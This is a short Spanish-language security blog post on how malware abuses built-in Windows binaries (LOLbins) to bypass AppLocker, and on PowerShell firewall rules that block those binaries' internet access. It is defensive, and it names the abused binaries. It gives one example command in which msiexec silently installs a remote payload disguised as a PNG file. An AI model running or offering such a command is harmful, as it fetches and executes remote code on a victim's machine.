Hoy en día, muchos tipos de malware y troyanos de acceso remoto (RAT) y APTs utilizan archivos binarios integrados de Windows para preparar e infectar computadoras. Los programas comúnmente utilizados en este tipo de ataques son powershell.exe, regsvr32, rundll32, certreq.exe, certutil.exe y mshta.exe.
Los binarios de Living of the Land (LOLbins) evitan protecciones como AppLocker, ya que residen en la carpeta de Windows y/o están diseñados en código por Microsoft. Un ejemplo es:
msiexec /q /i http://192.168.100.3/tmp/cmd.png
En el proyecto LOLBAS se puede encontrar una excelente descripción general de cómo se puede «abusar» de los archivos binarios integrados para descargar o ejecutar código.
Para obtener más información sobre como estas herramientas son utilizadas por delincuentes y APTs, se puede consultar este artículo de Cynet.
Estos script de PowerShell crean nuevas reglas de firewall que bloquean el acceso a la red de LOLbin, archivos binarios legales del sistema operativo y comúnmente utilizados para llevar adelantes ataques.
En resumen, los scripts evitan que las utilidades integradas de Windows accedan a Internet. Por ejemplo, en la mayoría de las circunstancias, usar expand.exe para acceder a un archivo remoto es extremadamente improbable y definitivamente estaría mal visto si fuera necesario por razones legítimas.
Estas listas de bloqueo deben usarse con cuidado porque el sistema operativo podría verse afectado:
Créditos:
Fuentes:
https://blog.segu-info.com.ar/2023/12/bloquear-lolbins-con-el-firewall-de.html
